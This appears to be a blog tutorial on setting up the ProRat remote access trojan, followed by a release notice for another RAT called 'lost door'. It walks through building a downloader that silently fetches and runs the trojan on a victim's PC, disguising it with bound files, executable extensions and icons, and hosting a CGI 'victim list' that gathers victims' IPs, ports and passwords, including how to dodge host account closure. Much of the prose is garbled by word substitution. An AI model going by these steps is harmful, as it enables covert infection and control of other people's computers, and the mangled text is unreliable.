Lets say :

You accept a active a chargeless breadth from http://www.tripod.lycos.co.uk/signup/signup.phtml and you got a web hosting like this “http://members.lycos.co.uk/yourarea/” and upload your server that you created with ProRat applicant to this area.

After you uploaded you server your server abode will attending like “http://members.lycos.co.uk/yourarea/server.exe” Now the alone affair you charge do is actualize a Downloader server.

CREATING DOWNLOADER SERVER :

To actualize a Downloader server you charge bang on “‘Create” button first. A popup awning card will appear. Bang on “Create Downloader Server” Button and get into the Actualize Downloader server menu..

When you blazon the URL on the Downloader server card it will save it automatically so aback you appetite to analgesic addition Downloader server it will advice you for extenuative time.

You accept to chase this way:

1-URL :

In the Downloader server card you accept to blazon the URL for the download action that will be done on the ambition PC. For example: “http://members.lycos.co.uk/yourarea/server.exe”

2-Bind With a Book :

You can bind your server\downloader server with a book that you want. You charge bang on the “Bind the server with a file” button and afresh the book button will be activated. You can accept a book to be binded with the server now. The addendum is not so important you can see the admeasurement of binded server in the ”Server Size” part.

3-Server Addendum :

You can accept the addendum of Server\Downloader server that you will create. ProRat server supports 5 extensions. You can use these extensions for server: *.exe – *.scr – *.pif – *.com -*.bat

But 2 of them abutment icons. Added ones don’t supports windows figure service. *.exe and *.scr has got figure abutment so you can accept figure for this extensions.

4-Server Figure :

If you accept a addendum that has got an figure support. You can baddest the one you appetite to use with the server from the baby pictures on the menu, but don’t balloon icons will accomplish the server admeasurement a little bigger afresh the accustomed size.

If you appetite to use these icons bang on the ‘’server icon” area and baddest the ”Server icon” box. Accept one of them and your server will use this figure afterwards created.

If you accept done all the settings, you can actualize Downloader server. Now You alone accept to Bang on “Create Server” button.

After you accept created your Downloader server you can change its name. It will automatically download the absolute server and run it on the ambition PC with invisibility.

Downloader server will restart it cocky until it downloads the absolute server on ambition PC.

Warning: If the ambition PC gets broken while the Downloader server is downloading the absolute server from the web host, the downloading action will not resume from the aftermost allotment it will aloof alone restart to download the absolute server afresh and If you appetite a action like resuming the download from a 2kb affairs you wont behaving adequately adjoin PRO GROUP.

Create CGI victim List

(copy pasted already again)

What is a Victim List? :

Victim annual is a arrangement that will let you appearance the advice beatific from the server aloof like the email and icq notifications. The advice beatific to your CGI annual contains your victims IP address, Anchorage number, countersign etc… that gives you victims all capacity for connection.

Creating Victim Annual :

This is one of the better differences amid added Trojans CGI notifications. ProRat has got the best CGI victim annual architect on its own client. You can acclimatize aggregate you appetite aback you are creating your victim list. You don’t accept to apart time in configuring the victim annual codes like the added CGI victim lists, and you can accept which accent you appetite to use in CGI victim list.

If you appetite to actualize your victim annual you charge bang on the actualize button and a popup card will appear, bang on actualize CGI victim annual button and you will see 4 boxes and a actualize cgi files button. The appearance of the boxes are listed below: :

Victim Annual Countersign :

If you appetite your annual adequate with a countersign you charge address which countersign you appetite to use in the bare box.

CGI Calligraphy Name :

You can accept the calligraphy name that doesn’t accommodate Turkish characters. If you appetite to change the name of the cgi annual afterwards you created your CGI Victim annual will not work. You charge change the name aback you are creating the file. Absence name of your cgi book will be prorat.cgi and it will be the best band-aid for this problem.

CGI calligraphy Abstracts :

You can accept the calligraphy name that doesn’t accommodate Turkish characters. If you appetite to change the name of the dat addendum book afterwards you accept created it will not work. You charge change the name aback you are creating your file. Absence name for your calligraphy abstracts book is log.dat and it’s the best band-aid for this problem. This scripts will save the logs advancing from server.

Max Cardinal for Annual :

This card will let you appearance the cardinal of victims in your list. Absence cardinal is 100. You can accept every cardinal for this bare but if you accept a cardinal like 10000 charlatan will assignment slow.

After you bureaucracy these details. Bang on the “Create CGI files” button.

How To Use:

To use this CGI victim annual tool. You charge accept a host with CGI support. You can booty a chargeless host from these sites

http://www.netfirms.com

http://www.tripod.lycos.com

After you annals an annual from a host, you charge upload “prorat.cgi and “log.dat” to your hosts cgi-bin binder in ASCII mod. Change the CHMOD for “prorat.cgi” to 755, and change the CHMOD for “log.dat” to 600. If you don’t apperceive what is CHMOD amuse apprehend the afterward steps.

INSTALL + IMPORTANT THINGS + FREQUENTLY ASKED QUESTIONS:

1-Learn that your hosting supports CGI. If it doesn’t accept a CGI abutment use addition host with CGI support.

2-Upload your files to the cgi-bin binder on your host and don’t balloon to analysis them you should see 2 files in your CGI agenda afterwards you upload them.

3-You charge upload your files to your host in ASCII mod. If you upload in bifold mod your CGI victim annual won’t work. If you appetite to break this botheration we acclaim to you upload with Cute-Ftp program. Professional FTP programs like Cute-Ftp can automatically accept the mod for extensions of files. If you appetite added capacity chase upload + ASCII + cgi in http://www.google.com

4-Did you bureaucracy the files to CHMOD in you host ?

The amount of the Victim lists capital book that is “prorat.cgi” charge be 755 in CHMOD, and the ‘log.dat’ amount charge be 600 in CHMOD.

You can acclimatize CHMOD afterwards you upload files with Cute-Ftp. Appropriate bang on the book and bang on CHMOD and chase the accomplish :

prorat.cgi :

Owner permissions :

[X]READ [X]WRÄ°TE [X]EXECUTE

Group permissions :

[X]READ [ ]WRÄ°TE [X]EXECUTE

Public permisions :

[X]READ [ ]WRÄ°TE [X]EXECUTE

log.dat :

Owner permissions :

[X]READ [X]WRÄ°TE [ ]EXECUTE

Group permissions :

[ ]READ [ ]WRÄ°TE [ ]EXECUTE

Public permisions :

[ ]READ [ ]WRÄ°TE [ ]EXECUTE

5-If you say I did all the settings appropriate but my annual didn’t assignment :

Did any adapt your prorat.cgi book afterwards you created it? If you edited your prorat.cgi book your annual may not assignment and actualize a fresh CGI file.

6-If you say, I’m accounting my countersign into my CGI victim annual but my victim annual doesn’t accessible we anticipate that you accept afflicted the names of your CGI files afterwards you created them, and this may annual this problem.

Don’t balloon if you appetite to change names of files you charge name them aback you are creating the files from the client, But if you are an avant-garde user you can accessible “prorat.cgi” with a argument editor and adapt the settings as you appetite to do in “prorat.cgi”.

7-If you are accounting the actual URL for your victims annual but it says “****** called book cannot be found”.

If you accept a botheration like this maybe you forgot to upload “log.dat” book to cgi-bin binder in host or you afflicted name of the log.dat book afterwards you created it.

8-IF you forgot the countersign that you put to your victim list. Actualize a fresh one and change the fresh prorat.cgi with the earlier one and don’t balloon to agenda it somewhere.

9-If you accept abounding victims but they don’t get listed on your victim list. Accessible prorat.cgi with a argument editor and arise to settings allotment and $show_list = “xxx”; address a amount instead of xxx like absence cardinal for that is “100″ , afterwards you set it, upload and alter t with the old file. If you say I can’t do that actualize a fresh prorat.cgi from Applicant and blazon a bigger amount for the max cardinal of annual for archetype 200.

10-if you say I did all the things but I don’t apperceive how to affix to my victim list. Blazon http://yoursite/cgi-bin/prorat.cgi on your browser and you will see your login page. The important point of you CGI URL is the end of your URL be the name of you cgi book of prorat.cgi and blazon it to the end of your URL.

For archetype you accept a annual like http://prorat.netfirms.com and you didn’t accord the absence name for prorat.cgi and instead you acclimated the name counter.cgi. your URL should be like this http://prorat.netfims.com/cgi-bin/counter.cgi

11-if you say I took a host from tripod but it doesn’t accord me permission to adapt manually CHMOD. That is accurate some hosts don’t gives permission for this but we can break this botheration with afterward steps.

Login on tripod’s folio with your username and countersign and go to FÄ°LE MANAGER. Your files will be apparent in a appropriate calligraphy folio and go to cgi-bin folder, analysis the box abutting to the ProRat cgi book and bang on the button at the larboard top (EDIT). Now annul all the things in prorat.cgi and archetype the prorat.cgi that is in your PC to your host and save it.

12-If you say I did all the things but I can’t upload log.dat. Blazon article on log.dat and try to accelerate it again. Afterwards you install your victim annual you can annul logs with the button called ‘Empty Page’ button.

13-If you say that you took a chargeless host with cgi abutment but the hosting aggregation bankrupt my account.

If you accept abounding victims, this cartage can be alerted to the admin of aggregation or you alone use cgi-bin of your annual it can active them too. Now you can accessible a fresh annual and put a armpit with 2-3 pages, and put a basis and affix to your ex users change the earlier cgi annual articulation with online editor.

14-If you don’t actualize prorat.cgi with ProRat applicant and downloaded it from about or if you appetite to upload it afterwards a continued time, you can change it to bifold mod while you are alteration it or downloading it. Download ProRat Applicant and actualize your own Victim list.

15-If you say I approved aggregate and I did all the things appropriate but my annual didn’t work:

If your age is beneath 16;

We acclaim you to not use ProRat for a brace of years and instead application ProRat go and comedy amateur or use your computer for education.

You will require to have Winzix to get PRORAT – remote computer access program. Download Winzixhere.Now, when you’ve created PRORAT server, next step is to send this server to victim computer plus then use PRORAT for remote computer access. I will explain in my next editorial about how to connect to remote PRORAT server on remote victim computer plus then use this for remote computer access. If you’ve any problem in using this


lost door v 3.2 Stable (Build 2)
[Image] lost door v 3.2 Stable (Build 2) done at 21 May my birthday date (happy birthday to me :lol: )
Lost door Official Website www.lostdoor.cn download http://www.lostdoor.cn/download.html Whats New :
———–
# [+] Remote Nat viewer
# [+] Rmote Resotr Manager
# [+] Added Some Graphics
# [+] Some minor Bugs fixed
# [+] Some Forms Has Been Modified
# [+] News Navigator was Added
Pictures :
————————
[Image][Image] [Image]


Labels

Blog Archive